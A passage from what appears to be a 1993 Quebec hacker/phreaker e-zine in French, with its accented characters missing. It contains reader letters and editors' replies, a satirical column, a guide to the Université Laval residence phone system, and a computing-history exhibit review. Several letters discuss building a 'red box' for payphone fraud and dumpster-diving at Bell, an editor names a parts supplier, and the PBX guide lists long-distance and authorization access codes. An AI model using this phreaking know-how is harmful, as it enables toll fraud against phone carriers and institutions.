l'internet (c'est-tu juste un mode 'chat' multiuser avec dungeon
master qui dirige le groupe ?)
C'est assez dans le dtail mais quand je 'capote' sur un sujet, je
veux tout savoir !
Pour finir, a marches-tu juste qu'
date, est-ce que la rponse
est bonne; j'espre, bien que je crains..., que la mise en oeuvre
d'une telle node soit directement relie au nombre de personnes
ayant donn leur appui (style tude de march). Tk, mon appui passe
99 % mais je crois que tu prfrerais 10 personnes
50 % qu'une
seule
100 %. Tk , je vais essayer de recruter du monde (je crois
que le type de l'infopeuple (le bab 'politique') serait intress).
Aussi, j'ai plein d'ides pour le bab mais je vais conomiser
l'espace disque du pauvre light bbs et attendre qu'une runion ou
qu'un tour de table soit annonc..., aprs tout plusieurs ttes
valent mieux qu'une...)
Ciao.
----------------
[Blitz- Tu sais, Murdock, c'est sr que a sera pas facile de
partir une node dans le sens du monde avec le genre d'argent qu'on
a
investir. Mais on va le faire, je te jure. Ceci dit, plus avant
dans le magazine, tu trouveras d'autres dtails sur la node et
Internet. Notre seule assurance, vois-tu, c'est qu'on deal avec du
"crack lectronique". En ce sens, on est srs de notre coup:
quiconque va "fumer une poffe" de LLC va tre accro
vie! C'est
garanti sur facture!]
[Gurney- Pour les news groups, si tu veux savoir comment en crer
un, lit le groupe "news.announce.newusers", tu y trouveras une FAQ
qui dcrit bien comment faire pour crer un newsgroup. Dans les
hirarchies traditionnelles, tu dois faire voter les users de
Usenet et les rsultats dcideront si le groupe est accept. Dans
la hirarchie alt.* c'est beaucoup plus simple, je crois (pas sr)
que tu peux crer arbitrairement un groupe.]
[Kermit- Tu veux te partir un mud? Ca va te prendre une permission,
un site, et pas mal de temps en programmation, car tu vas commencer
avec une source en c de base (mudlib), totalement vide. Ensuite, tu
vas avoir
rajouter TOUT le stock, ennemis, labyrinthe, etc.. Si
a te branche encore... Pas vraiment de master, c'est plutt le
bordel. Il y plusieurs sortes de muds, au got du gars qui l'a
mont.]
[TSP- Pour continuer sur la lance de Kermit sur les MUDs, t`as
l`admin en haut (God, Arch-Wizard), t'as le Wizard Concil qui
dcide de l'orientation du mud, et t'as les players normaux en bas
(qui sont souvent plus de 30-50 loggs en mme temps). Tu peux
trouver des muds bass sur toutes les poques et tous les sujets --
Mdivale, Futuriste, Jurassique, Startrek, Tolkien, etc... Lis le
newsgroup rec.games.mud.announce, une liste de tous les muds
disponibles y est poste hebdomadairement.]
----------------
"Messages Blitz" (Msg Priv) #604
Date : 03-09-93 22:21 De : M. L.
A : Blitzkreig
Sujet : Bab de MONTRAL...
Salut,..
Encore un mois ou NPC sort un de ces bon magazines... eh ben en
attendant que j'aie un 14400 bds, pourrais-tu me dire le numro
d'une place
Montral ou je peux me procurer votre magazine...
cause que je viens de dmnager
Montral... et que a me
coterait cher de LD...
A part a continuez votre beau travail anarchique et de
dnonciation..!!
Dans mon cas, j'ai 25 ans et j'ai un bac et une job
de...secondaire,...mais anyway je cherche pareil mais le pire c'est
mes amis, certains sont sortis ingnieurs pis y se retrouvent le
cul-
-l'eau, sans travail,...pourquoi? A cause de ces crisses de
Baby-boomers qui gardent toutes les jobs...je le sais, a m'a
frustr de le constater! Nous les jeunes...on veut travailler, pis
tu vois ces gros(ses) qui se pognent le beigne
>50 000$ / an, pis
nous on se fend le cul
20000-25000 $ / an sans compter les
heures, touffs par le remboursement des prts et bourses...etc...
Ben moi avec a, a m'entrane vers les activits illicites
(travail au noir, achat de stock vol...) pis a me drange pas de
le faire. J'ai aussi trash les poubelles du Bell dans la rgion de
Sherbrooke... mais sans grand rsultat,...mais maintenant,...2
difices du Bell sont prs de chez moi...hehehe ...alors je vais
essayer de dnicher des choses intressantes (et
vous les
communiquer si a vaut la peine...)
Anyway, si vous avez besoin de gars pour vous aider,
distribuer,...ect,...je suis prt
le faire!!! Demandez-moi
n'importe quoi...de croche,..hehehe
Salut,...
Krugan
----------------
[Blitz- Merci Krugan pour ta jolie lettre. En dehors de tes
compliments qui nous font rougir, tu as pris la peine de nous
donner ton opinion sur la socit en gnral et, personnellement,
c'est le genre de chose que j'aime lire par dessus tout! Pour ce
qui est de distribuer, il n'y a que quelques boards pirates,
Montral, avec des sections NPC toffes. Trouves-nous un ou des
babs publics
Montral qui voudraient ouvrir des sections NPC
compltes, avec courrier, et je vais personnellement aller les
visiter. Et pour le reste... Atreid?]
[Atreid- Me voici
la rescousse! Quoique... Je n'ai pas grand
chose de plus
dire... ;) Les rares fois que j'appelle
Montral,
je n'appelle que sur 2-3 bbs underground. Comme je ne donne jamais
de numro (surtout pas dans NPC), tu devras faire le tour des bbs
publics... Je ne sais pas du tout o nos bienfaiteurs ont envoy
NPC... Pour ce qui est de ce que tu peux faire, et bien le mieux
que tu puisses faire serait de distribuer NPC comme un dchan
dans les quelques trois cents bbs publics qui peuplent Montral. :)
]
----------------
Message #60/60 in ÄÍÍ Messagerie Prive NPC ÍÍÄ [Local]
Info : [PRIVATE]
From : FxC
To : Blitzkreig
Salut Blitzkreig!!!
Je t'cris pour te faire une proposition ...j'habite
T-R et je
vais bientt ouvrir un nouveau board spcialis dans le H/P/C/A/V.
Depuis un bon bout de temps je me promne dans les board ld de
Qubec et MONTRAL (ex: cybernetic violence , brain damage, etc.).
J'ai recueilli beaucoup d informations et je trouve que NPC forme
le meilleur groupe dans le genre au Qubec. En passant j'ai
remarqu que plusieurs personnes se plaignent qu'il y ait trop
d'articles de journaux dans vos mags: et bien je ne suis pas
d'accord avec eux car je trouve que a ajoute grandement au
magazine... en tk tout a pour dire que j'aime bien votre groupe et
que je pense fortement ouvrir une base de messagerie comme ici,
mais
TR. Pour ce faire et pour vous viter d'avoir des troubles
de LD, je pensais que je pourrais m'associer
un autre board d'ici
comme black palace par exemple qui supporte une telle messagerie,
question d'informer les hackers de ma rgion sur votre groupe, peu
connu dans mon coin. Le seul groupe que nous ayions n'est pas
encore trs qualifi et n'en est encore qu'
ses dbuts et cela est
d au fait que peu de gens
TR savent ce que le hacking reprsente
vraiment. En tk, je vais arrter ici question de pas payer trop
cher de LD. Si tu es d'accord avec ma proposition fais-le moi
savoir car je suis certain que l'on pourrait faire affaire
ensemble...
P.S : j'essaie de me faire une red box de ces temps-ci... j'ai le
crystal 6.5664, mais il me manque un tone dialer avec memoire.
Est-ce que ce genre de chose se trouve
Qubec??? En tk il n'y en
a plus
TR ni
MONTRAL je crois.
Sur ce BYE
Anhilator
------------------------------
[Blitz - OK pour une section sur un bab PUBLIC
Trois-Rivires. Je
vais m'occuper personnellement d'aller te porter le stock dont tu
as besoin, et d'aller faire un tour une ou deux fois par semaine
lire le courrier. Laisse-moi le numro quelque part en priv. Pour
ton cristal, je ne sais pas pour Qubec, mais as-tu appel chez
Addison
Montral? Je te jure qu'ils ont du stock! Tu pourrais
probablement trouver le numro de Addison dans NPC 4 ou 5, dans
l'article sur le hacking des cabines tlphoniques. Merci de nous
lire! Quelque chose
ajouter, Atreid?]
[Atreid- J'ai retrouv des plumes et du sang sch sur le museau de
mon chien hier soir. Les flics m'ont dit qu'ils n'emprisonnaient
pas leurs semblables...
J'ai vaguement entendu dire que les dialers Radio-SCRAP AVEC
mmoire avaient t interdits au Canada... Bien que je trouve a
ridicule et trs peu plausible (faudrait vraiment plus savoir quoi
interdire!) ]
--------------------
Et pour terminer, une lettre crite que Merlin nous a fait
parvenir, d'une camarade de lutte
lui. On dirait bien qu'il y a
encore plus de monde qui nous lit en imprim que nous le pensions,
car cette personne n'a pas, semble-til, d'ordi non plus...
---
Anarchistes lectroniques de mon coeur,
depuis quelques semaines, les journaux nous parlent d'une
certaine Fondation Octobre 70, qui runit tous ceux et celles qui
ont connu la btise tatise et les cachots de Parthenais ou
d'ailleurs, lors des rafles massives de citoyens en 1970. Ces gens
de la Fondation rclament des excuses du gouvernement fdral pour
leur incarcration illgale. Naturellement, tout ce qu'ils vont
rcolter, c'est des insultes et du mpris des PET et Chrtins qui
taient au pouvoir
l'poque.
Je veux m'inscrire en faux contre la dmarche indcente de ces
indpendantistes (s'ils en sont encore) qui, aujourd'hui,
s'abaissent
rclamer des excuses, voire des compensations, du
gouvernement canadien pour la mise en application de sa Loi sur les
mesures de guerre, en octobre 1970.
J'ai moi-mme t arrte, accuse d'appartenance au FLQ, et
dtenu pendant 51 jours, dont 21, incommunicado (le cachot, pas de
contact avec un seul tre humain, mme pas avec un policier), tout
comme plusieurs des personnes qui se dclarent membres de la
Fondation Octobre 70. Je dresserai pas la liste des svices, mais
le mot "torture" s'applique fort bien dans certains cas.
Contrairement
eux, cependant, je suis une indpendantiste
cohrente et consquente et me considre donc comme une ennemie du
fdralisme canadien que je combats depuis le dbut des annes 60
et que je combattrai jusqu'
l'avnement de l'indpendance du
Qubec ou jusqu'
ma mort, si, malheureusement, notre peuple ne se
dcidait pas, avant,
assumer sa libert.
Que le gouvernement canadien et ses acolytes du gouvernement
qubcois me dclarent la guerre ne m'offusque donc pas. Qu'ils
cherchent
contrer mes actions par tous les moyens, mme les plus
antidmocratiques, ne m'tonne pas non plus, puisqu'il est dans la
nature de ce systme d'employer la force contre notre peuple.
Le fdralisme canadien n'est en effet rien d'autre qu'une des
innombrables formes de l'expression de la violence et de la
domination exerce sur nous depuis la conqute anglaise, par les
armes, en 1760, et n'est rien d'autre que la suite immdiate et
logique de la rpression, par les armes, de la rbellion des
Patriotes, en 1837-1838. Si vous avez une minute de trop, les
jeunes, tudiez votre histoire, et vous allez vous apercevoir que
tu peux pas tre autre chose qu'indpendantiste, si t'as une tte
sur les paules. tudiez l'histoire, toute l'histoire, pas
seulement celle crite par les envahisseurs. C'est d'ailleurs un
des graves dfauts de l'histoire, d'tre toujours crite par les
gagnants, favorisant par le fait mme leur point de vue.
Je trouve donc inconcevable qu'en pleine guerre, au moment o
nous sommes peut-tre en train de la gagner enfin, un groupe
d'indpendantistes se trane aux genoux du pouvoir dominateur pour
lui demander de s'amender, mme si c'est pour faire une piasse
facile ou humilier les libraux de l'poque, ceux des deux bords.
Je tiens donc
me dissocier publiquement de ce comportement
indigne, de ce comportement de pleutre et de limace, signe
dcourageant, s'il en est, des effets profonds et durables du
colonialisme. Je ne revendique pas mes combats, parce que je ne
veux pas ressembler
une vtran dcatie qui n'a plus que ses
mdailles sur la poitrine pour indiquer
la face du monde qu'elle
a dj
t quelqu'un. Trs peu pour moi, cette attitude passiste.
Pour moi, le combat n'est pas termin, et je n'en suis pas
tracer
le bilan d'une carrire "au service de la patrie". Mais je ne veux
pas, par contre, qu'on vienne bafouer, au nom de sales lchets
opportunistes, les leons que l'histoire nous a lgu.
Je sais que je fais solennel, mais il y a des btises qu'il
faut dcrier avec sobrit, et qui ne seraient que dissimules par
le ridicule et l'opprobre.
Si seulement j'avais un pays...
Jeanne D'Arc... (pas mon vrai nom)
-------------
[Blitz- Ciel, que c'est beau! Snif...]
[Atreid- J'en suis tout mu... En fait, je crois que cette tension
qui caractrisait les annes 70 est en train de refaire surface.
Avec l'lection de Chrtin ou de Kim Campbell, je sens, et je ne
suis pas le seul, que la tension va remonter en flche d'ici
quelques annes. Je crois qu'un peu de tapage ne fera pas de mal,
car, en fait, a ne peut pas vraiment aller plus mal... Et dans ce
cas, au moins, on ne se battrait pas pour la survie d'un pays de
tortionnaires comme le Canada...]
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
LE FRANC PARLER DU VIEUX MDE
par Merlin L'Emmerdeur
Les temps sont durs. Ces jours-ci, j'ai beau chercher, je ne
trouve personne contre qui dblatrer en lui bavant gnreusement
dessus. Ce n'est pas de ma faute et je vous jure que j'ai bien
cherch. C'est peut-tre parce que c'est l't, qu'il fait beau et
chaud (enfin, il ne neige pas), parce que je n'coute plus le
Bernard Derome Show et que je me contente de lire les bandes
dessines du journal. J'ai toujours prtendu que la page des b.d.
est encore la section la plus crdible d'un journal.
J'imagine alors une b.d. o Jean Chrtien (j'espre que vous
apprciez, je n'ai pas crit Jean Crtin) est Pluto (plutt moche),
Kim Campbell est Philomne, Grard D. (moins) Levesque est M.
Dithers, les ministres Paradis, Ciaccia, Bourbeau et Johnson sont
les frres Dalton, Jacques Parizeau est Hagar l'Horrible, Jean
Garon est l'lphant de la Junglerie, Bourassa le serpent, Bacon,
le crapaud, Rmillard, Lo le lion lavette, Chevrette le gnou, Lisa
Frulla Hbert, l'oiseau cervel perch sur son fil tlgraphique.
Je n'arrive pas
dnicher un personnage assez dgueulasse pour
jouer Claude Ryan. Mme un auteur de b.d. sait qu'on ne peut pas
montrer a aux enfants.
Voil
que a me reprend, chassez la mchancet et elle revient
par la porte d'en arrire. Aussi, aujourd'hui je voudrais vous
parler des gens que j'aime bien. (Si vous avez rpondu non
la
section "A", passez directement
la section "C").
J'aime Galile parce qu'il tait le seul
avoir raison (on
sait ben t'es toujours tout seul
avoir le pas). Jamais un pape,
mme inspir de l'Esprit Saint, ne s'tait plant comme a. J'aime
Einstein pour son E=MC2. Grce
lui on sait qu'un fonctionnaire ne
dpassera jamais la vitesse de la lumire. J'aime les
Impressionnistes en vrac et Czanne en particulier. J'aime
Paganini, Mozart et Francesco Tarrega. J'aime le petit chinois qui
s'est tenu debout devant les chars d'assaut place Tien El Mein.
J'aime le ramoneur des pauvres Godbout. Il mrite le Nobel de la
paix mais on a prfr le donner conjointement au secrtaire
gnral de l'URSS et
Richard Nixon (vous vous rendez compte, le
Nobel
Nixon!). J'aime mre Thrsa, le docteur Schweitzer, Che
Guevarra et Jimmy Carter. J'aime les hommes qui ont peint les
grottes de Lascaux, j'aime les hommes qui ont conu le Concorde et
ceux qui ont particip
la conqute de la Lune. J'aime Boris
Eltsine, Pierre Bourgault et Isaac Asimov. J'aime Frdric Bach
(l'Homme qui plantait des arbres) et Claude Dubois. J'aime Flix
Leclerc, Frdric Dard (San-Antonio) et les Vilains Pingouins.
J'aime Konrad Lorentz, Michel Tremblay et Stephen King. J'aime ma
premire belle-mre et j'aurais d l'pouser plutt que sa fille.
J'aime Jean Garon et Camille Laurin. J'aime le chien de mon voisin
qui fait un gros Wouarff sans conviction quand je passe par l
(pour faire son devoir de gardien mais aussi pour me dire bonjour).
J'aime le cheval de mon voisin parce qu'il se fout pas mal de ce
que je peux faire ou penser. J'aime aussi les poules de mon voisin
qui donnent des oeufs savoureux (les jaunes sont jaunes) et qui
n'ont pas les prtentions des poules du Beaugarte. J'aime les
vaches et les gens qui aiment les vaches. Quand on y pense, les
vaches demandent peu et donnent beaucoup. J'en fais une liste
exhaustive (a fait pas Devoir a?): du lait (videmment), de la
crme, de la crme glace, du fromage, du cowsteak (pourquoi
toujours du beefsteak), des vestes de motard, des sacs
main, des
souliers, des hot-dogs, de la bouffe
chien et
chat et
finalement de la colle blanche. Dans ces conditions, traiter madame
Baconne de grosse vache, c'est insulter les vaches. Je commencerai
respecter (un peu) madame Baconne quand elle donnera son corps et
ses 150 kilos
la fabrique de colle blanche de son comt.
Mais ce n'est pas tout: avant de mourir et d'engraisser le
sol, une vache peut faire de jolies petites copies d'elle-mme qui
rendront les mmes services
la socit. Ce n'est pas rien! Avez-
vous dj
vu une BMW ou un Amiga 500 faire une copie d'eux-mmes
simplement en bouffant du (vrai) foin?
J'aime aussi des rivires propres, des forts vertes, des
poissons heureux dans l'eau, des oiseaux dans le ciel. Tout ce
qu'on s'acharne
dtruire.
J'aime aussi monsieur Newton, monsieur Darwin, monsieur
Planck, monsieur Turing, monsieur Schrodinger, monsieur
Schwarzschild (c'est pas d'la marde,
chaque fois, il faut que
j'aille voir dans le dico) et beaucoup d'autres parmi leurs amis.
J'aime Euclide, ce vieux grec qui a calcul le diamtre de la
Terre ainsi que la distance du Soleil
la Terre sans autre
instrument que son cerveau.
J'aime Jacques Brel (une chanson, c'est aussi des textes) et
Jsus-Christ. Je crois que Brel et le Christ auraient pu deviser
lgamment en fumant un joint. J'aime la mari, l'opium, le tabac,
la morphine et l'alcool. Seuls le pape, les femmes et les vaches
"n'ont pas besoin de a pour tre heureux". Encore que les vaches
ne ddaignent pas un champignon magique si elles en trouvent. Reste
le pape et les femmes. J'aime l'odeur du foin coup et le parfum
purement dlicieux de ces grandes herbes sauvages avec de toutes
petites fleurs blanches au sommet. Ca ne se met pas en bouteille,
mme pas pour ces vroleuses en peau de zibeline. De toutes faons,
les bcasses en souliers de croco et en petite culotte en peau
d'ocelot les prendraient pour de la mauvaise herbe et se mettraient
ternuer.
Comme je l'ai dj
dit, j'aime Jsus-Christ et sa prche et je
ne demanderais pas mieux que de croire en son Dieu s'il n'tait pas
aussi vicieux. J'aime la petite grenouille qui se jette vivement
l'eau quand un gros monstre comme moi s'aproche de son tang.
J'aime la perdrix qui simule une blessure
l'aile pour loigner le
mme gros monstre de ses petits. J'aime Ral Cayouette qui, mme
mort, est encore plus fringant et dynamique que Jean Chrtien, Kim
Campbell, Bob Rae et Robert Bourassa runis. J'aime mon voisin qui
est inculte mais intelligent, qui n'a pas de complexe
tre
inculte et qui n'a pas de complexe
en attraper lorsque a passe.
J'aime mon voisin parce qu'il parle pour le plaisir d'changer et
non pour avoir raison
tout prix. J'aime Blitzkreig parce qu'il
ralise un projet qui lui tient
coeur. J'aime que les gens
ralisent un rve.
Finalement, j'aime ce gros chien tellement poilu (un peu moins
que ma seconde belle-mre, tout de mme) que l'on est jamais tout
fait certain de savoir
quel bout on s'adresse. Attendez d'avoir
une peine d'amour dvastatrice, attendez de ne plus croire
rien,
quand je dis rien, je dis rien, attendez d'avoir le moral
moins
35... Cette grosse bte qui nous aime bien (allez savoir pourquoi?
La mesquinerie c'est de croire que les chiens nous aiment seulement
parce qu'on les nourrit), donc cette grosse bte, sans un sou de
malice, poussera vers vous une balle de caoutchouc aussi ronge que
lpreuse et vous invitera
jouer
"attrape-l
si t'es capable".
Est-ce que ce n'est pas une raison suffisante pour croire en la
cration?
Salut petit mec. Je n'ai pas de conseil
te donner, aussi je
ne t'en donnerai pas.
Merlin L'Emmerdeur
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
Introduction au PBX des residences de l'Universite Laval
par
Gurney Halleck
Depuis la fin aot, les rsidences de l'universit Laval
sont munies d'un nouveau systme tlphonique appel IBX. Ce
systme est trs intressant, vous allez voir. Il permet
toutes
les personnes en rsidence d'avoir une boite vocale, le transfert
d'appel, des confrences
3, etc. Je vais donc vous dcrire les
fonctions les plus intressantes.
Pour rejoindre un poste sur ce systme, il vous faut
composer le 656-7777 et ensuite le poste dsir. Les postes
disponibles ont tous 5 chiffres et commencent tous par 1xxxx. Pour
rejoindre le service de messagerie vocale, composez le 656-7078,
puis faites # et votre numro de poste (1xxxx), ensuite votre code
de scurit (il a 6 chiffres par dfaut, mais le nombre de chiffres
est configurable par l'usager), et ceci vous donne accs
cette
boite vocale. Une fois entr, plusieurs fonctions s'offrent
vous.
Voici les principales commandes: le 5 vous permet d'avoir
accs aux messages. Pendant que vous coutez les messages,
plusieurs options s'offrent
vous. Tapez le 0 pour accder
ces
options. Par contre, faites le 5 pour couter le message suivant,
le 8 pour savoir l'heure d'entre du message, le 2-2 pour reculer,
le * pour mettre en pause ou rsumer l'coute, le 4 pour avancer,
le 1-5 pour couter le message prcdent, le 3 pour effacer le
message en cours, et le 7 pour le sauvegarder (3 jours max). Les
messages s'effacent automatiquement aprs 7 jours.
Le 4 vous permet d'avoir accs aux fonctions de
salutations. Vous pouvez, avec le 1, activer la fonction
salutation, avec le 2 annuler la fonction salutation. Le 5 vous
permet d'couter le message de salutations. Vous pouvez, avec le 6,
enregistrer un message de salutations, * fera une pause durant
l'enregistrement et # sauvegardera le message (message: 15 sec.
max.). Le # sert pour sortir de la fonction salutations.
Le 1-6 vous donne accs aux fonctions particulires. Le 2
vous permet de changer le code de scurit. Pour ce faire, composez
le nouveau code puis #, recomposez
nouveau le code puis #. Pour
ne pas changer le code et quitter cette option, tapez simplement #.
Le 1-8 vous permet de changer le volume.
Le 0 vous donne accs
la fontion d'aide. Le 0 vous
donnera la liste des fonctions disponibles.
Le 9 sert
quitter la boite vocale. Le 9 met fin
la
session. Le 0 vous permet de quitter et de faire un autre appel
(pas d'appels externes). Le * vous permet de rester dans la boite
vocale.
La fonction de confrence
3 est trs amusante, mais elle ne
peut pas (selon mes tests) tre enchaine d'une faon locale i.e.
si je suis en confrence avec 2 personnes, ces deux personnes ne
peuvent pas ajouter d'autres personnes
la confrence. Par contre,
si je contacte des personnes de l'extrieur, d'autres confrences
peuvent tre enchaines
la premire. Je l'ai test avec 6
personnes (les personnes
chaque bout de la confrence avaient du
mal
s'entendre).
Malheureusement, la plupart des fonctions intressantes ne
fonctionnent pas de l'extrieur, comme le 9811 pour avoir une ligne
interurbaine vous permettant de vous servir de votre carte d'appel,
ou le 9311 et ensuite votre code d'autorisation de 10 chiffres
(!!!) pour pouvoir faire vos longues distances en paix...
Un systme de communication de donnes s'ajoutera sous peu. Je
crois que le systme consistera en une interface synchrone
9600bps relie aux DECServers de l'universit par l'entremise d'un
autre systme IBX comme celui qui relie dj
les terminaux de tout
le campus (j'en ai vu un au local VCH-3880). Malgr des rapports de
diverses sources qui prtendent qu'ils auront droit
des jacks
Ethernet comme dans les universits civilises, je n'en crois rien
car Laval n'est pas civilise.
Malheureusement, ce systme cotera un supplment aux
rsidents de l'universit. :-(
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
LES ORIGINES DU CYBERSPACE
Une expo
visiter
par Blitzkreig
Des tudes ralises pour NPC prouvent que 99.9% des gens qui
lisent NPC font du modem! (Pour ceux qui seraient tents de nous
rtorquer que c'est l'vidence mme, if you can't take a joke, FUCK
YOU!)
Je suis all, mardi le 14 septembre, au lancement de presse
d'une nouvelle exposition au Muse de la Civilisation. Elle
s'appelait : TRAVAILLER: NOUVEAU MODE D'EMPLOI. Boy! Oh boy! Y ai-
je vu des belles affaires!
Vous connaissez sans doute tous le Muse de la Civilisation,
qui est situ au 85 rue Dalhousie, dans le Vieux-Port. Peut-tre y
tes-vous mme alls. Mais il est temps d'y retourner, parce que
cette nouvelle expo (qui va quand mme coller l
jusqu'au 13 mars
1994) vaut le dplacement. Toute l'histoire de l'informatique y est
illustre, avec des textes, des photos et des objets.
Cette exposition a tout pour elle. Seul dfaut: elle est
commandite par Bell. Remarquez, il faut bien que l'argent que Bell
nous vole serve bien
autre chose qu'
engraisser ces pourceaux
mcrants! Vous allez ainsi
pouvoir voir le premier disque dur
(attendez de voir la taille de l'objet!), vous aller pouvoir
exprimenter avec les dernires technologies dans le domaine du
multimdia. Vous allez pouvoir pianoter sur un espce de SIM-
FONDERIE, un peu sur le modle de SimCity, dvelopp pour Alcan.
Vous allez voir
l'oeuvre des chanes entirement automatises de
robots.
Premirement, vous vous pointez au Muse de la Civilisation un
mardi (journe NPC par excellence, puisque c'est gratuit le
mardi!). Les heures d'ouverture sont de 10 heures du matin
17
heures. Vous allez devoir loafer un cours en aprs-midi, donc. Mais
c'est pour une bonne cause! Ou alors, pointez-vous
la
bibliothque de l'universit Laval, et allez chercher un signet
gratuit du Muse. En prsentant ce signet
la porte, en mme temps
que votre carte d'tudiant, l'entre ne vous cotera que 2$.
Une fois cette formalit accomplie, vous vous dirigez vers
l'aile ouest, deuxime tage. Attention
la marche!
HARDWARE
Comment sont ns les ordinateurs? La plupart des gens croient
que les ordinateurs sont ns immdiatement apþs la seconde guerre
mondiale, avec les monstres de UNIVAC. Ce n'est pas tout
fait
vrai. Tenez-vous bien les amis: le premier ordinateur a t CONU
(je dis bien "CONU", pas "construit") en 1822 (au fucking 19me
sicle!) par un Anglais Charles Babbage. Cet illumin avait imagin
et dessin une machine
permutations, avec un paquet de roulettes
de cuivre, mues par la vapeur, qu'il appelait THE DIFFERENCE
ENGINE. Il en avait mme construit un prototype
l'chelle, qu'il
tranait avec lui
chaque fois qu'il allait voir un mcne
susceptible de lui verser les fonds ncessaires
la construction
du vrai modle. Quatorze ans plus tard,
bout de ressources,
Babbage obtint une audience auprs de la reine Victoria, dtermin
lui qumander un financement. Cette salope de reine s'tait
probablement leve du mauvais pied ce jour-l
, parce que non
seulement elle ne lui versa pas d'argent, mais elle lui interdit de
continuer ses travaux. Cette idiote considrait qu'il n'y avait
aucun avenir pour une machine
permutation (mais a-t-on jamais vu
un politicien avoir une ide visionnaire, ou une ide tout court?).
Exit l'ordinateur circa 1836, donc. fermez les yeux quelques
secondes et tentez d'imaginer o nous en serions aujourd'hui si
l'ordinateur tait n cent ans plus tt! It boggles the mind, ain't
it? Parce que son ordinateur (si on peut appeler de la sorte cet
engin, qui fonctionnait A VAPEUR), son ordi donc FONCTIONNAIT!!! Si
d'aventure vous passez par Londres lors de vos prochains voyages,
arrtez-vous au Science Museum de South Kensington, o les
responsables ont construit THE DIFFERENCE ENGINE d'aprs les plans
originaux, en 1991, pour clbrer le 200me anniversaire de la
naissance de Charles Babbage. Et il y a une jolie photo du
Difference Engine au Muse de la Civilisation.
Imaginez, si elle avait dit "oui", o nous en serions
aujourd'hui... Actuellement, certains auteurs l'ont imagin: THE
DIFFERENCE ENGINE est devenu un roman, sous la plume des deux kings
du cyberpunk, William Gibson et Bruce Sterling.
Enfin, je croyais, jusqu'
ma visite au Muse de la
Civilisation, que Babbage avait t "l'inventeur" de l'ordi.
Erreur! En effet, ds l'entre dans l'expo, aprs quelques gugusses
sans intrt, vous aller voir une grosse carte perfore, en bois.
C'est l'anctre de l'ordinateur, a, les enfants! Le vrai! Vers
1800, un foutu franais, Joseph Marie Jacquard mit au point une
machine pouvant tre manipule par peu d'employs, grce
ce
morceau de bois "
mmoire". En effet, la disposition des
perforations dans la "carte" constituait une sorte de mmoire
permettant au mtier
tisser de reproduire le plus simplement du
monde des motifs compliqus, dvelopps grce
l'habilit manuelle
de plusieurs gnrations de tisserands. C'est la premire
"programmation" de l'exprience et du savoir humain, disponible
tout jamais pour les gnrations futures.
C'est ce mtier
tisser qui a inspir Charles Babbage.
D'ailleurs, sa collaboratrice principale disait justement:
"Nous pouvons justement dire que la machine analytique tissera
des motifs algbriques, tout comme le mtier Jacquard tisse des
fleurs et des feuilles."
-Lady Lovelace, collaboratrice de Babbage
SOFTWARE
Une machine
"computer", donc. Mais, et vous le savez aussi
bien que moi, qui dit "ordi" dit "programmeur". Babbage avait donc
dans l'ide une srie de structures bien dfinies pour construire
une machine qui diminuerait le travail fastidieux des manipulateurs
de formules mathmatiques et qui, et c'tait le but vis,
permettrait de diminuer les fautes de calcul imputables
l'erreur
humaine. Son grie, son inspiratrice, sa conseillre et
confidente, bref celle qui l'a fait vivre pendant toutes ces annes
de vaches maigres s'appelait Lady Ada Lovelace. C'tait la fille de
Byron, et une mathmaticienne de premire, respecte et considre
par ses contemporains. Elle est volontiers dcrite par les
connaisseurs comme tant de facto la premire programmeur(e). Un
langage de programmation paru dans les annes 60 porte d'ailleurs,
titre d'hommage, son nom. Vous connaissez ADA?
Il aura fallu attendre cent ans, et l'arrive de John von
Neumann aux States, pour que l'ide du "computer" soit relance.
Cet exil hongrois (n'oubliez pas, la guerre!) a conu et dvelopp
un modle de calcul en srie, alors qu'il dtenait une chaire
l'universit de Princeton. Ironiquement, ce modle n'tait pour lui
qu'un rbus intellectuel qu'il se jouait dans ses moments libres,
car son esprit tait autrement plus absorb par des sujets plus...
vitaux. Le Manhattan Project, a vous dit quelque chose? OUI! Ce
salopard tait un des principaux chercheurs de l'quipe de
Oppenheimer qui mit au point LA BOMBE ATOMIQUE! C'est aussi von
Neumann qui eut la BRILLANTE ide de dvelopper la bombe
hydrogne... Il y en a qui ont vraiment du temps
perdre... Bon,
on va pas s'tendre l
-dessus: les annes 40, UNIVAC et le tube
vide; survient un peu plus tard le transistor (merci Motorola!),
puis le circuit intgr. On en est aujourd'hui aux ordinateurs de
la quatrime gnration, la gnration des tout p'tits, celle des
puces. Il semble que les japonais soient dj
en train de concevoir
(en fait, depuis un certain temps dj
), la cinquime gnration,
un espce de bidule du style ordinateur
plasma ORGANIQUE, avec
des cellules mutantes baignant dans un liquide oxygn, cellules
capables d'accumuler des bits et de discuter entre elles. On en est
tenter d'essayer d'imiter (wow! trois verbes en ligne!) le
cerveau humain, folks. Mais c'est loin d'tre au point, si vous
voulez mon avis...
Les mini-ordinateurs ne sont apparus que vers les annes 60,
en mme temps que la mini-jupe, justement. La relation est plus que
fortuite: Digital Equipment baptisa ainsi son modle PDP-5, un
"minicomputer", en l'honneur de ce morceau de vtement qui eu
l'heur de faire loucher tant d'hommes (tant de femmes et si peu de
temps!). Il est amusant de constater que l'on boucle la boucle: en
effet, Intel
dcid d'appeler son nouveau chip (l'quivalent du
586) Pentium, ou P-5. Ce serait en l'honneur du PDP-5 que cela ne
m'tonnerait pas!
HACKERS
Mais, pendant ces vingt annes o un ordinateur occupait
quasi-obligatoirement tout un plancher dans un de ces gros
immeubles, que pouvait donc faire la personne intresse
explorer
ce nouvel univers? Il tait alors hors de question de permettre
tout un chacun d'avoir accs, physiquement,
ces monstres qui
cotaient une fortune. Originellement, les constructeurs avaient
calcul qu'on n'aurait jamais besoin de construire plus de CINQ
ordinateurs! Ils croyaient en effet que l'humanit n'aurait jamais
l'usage de plus de machines! Et les brancher sur un circuit
tlphonique tait hors de question. Mme aprs l'arrive des mini-
ordinateurs (le vtre est un MICRO-ordinateur, je vous le
rappelle), le cot d'une telle installation tait naturellement
hors de porte de la plupart des bourses. Heureusement, il y avait
les universits! Les universits qui pouvaient se payer un mini, et
le mettre
la disposition de quelques tudiants. C'est ici que
sont apparus les premiers hackers, au sens le plus "noble" du
terme. Les quelques initis ayant accs
